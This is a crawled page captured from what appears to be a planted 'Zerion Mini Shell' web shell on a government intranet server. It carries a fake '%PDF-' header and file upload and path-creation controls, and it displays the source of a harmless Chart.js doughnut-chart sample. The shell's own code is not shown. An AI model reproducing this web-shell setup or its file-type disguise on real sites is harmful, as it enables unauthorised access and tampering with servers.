%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/intranet.tjamich.gob.mx/intranet/common/vendors/chart.js/samples/
Upload File :
Create Path :
Current File : /home/tjamichg/intranet.tjamich.gob.mx/intranet/common/vendors/chart.js/samples/doughnut.html

<!doctype html>
<html>
<head>
    <title>Doughnut Chart</title>
    <script src="../Chart.js"></script>
    <meta name="viewport" content="initial-scale = 1, user-scalable = no">
    <style>
        canvas {
        }
    </style>
</head>
<body>
<canvas id="canvas" height="450" width="450"></canvas>


<script>

    var doughnutData = [
        {
            value: 30,
            color: "#F7464A"
        },
        {
            value: 50,
            color: "#46BFBD"
        },
        {
            value: 100,
            color: "#FDB45C"
        },
        {
            value: 40,
            color: "#949FB1"
        },
        {
            value: 120,
            color: "#4D5360"
        }

    ];

    var myDoughnut = new Chart(document.getElementById("canvas").getContext("2d")).Doughnut(doughnutData);

</script>
</body>
</html>

Zerion Mini Shell 1.0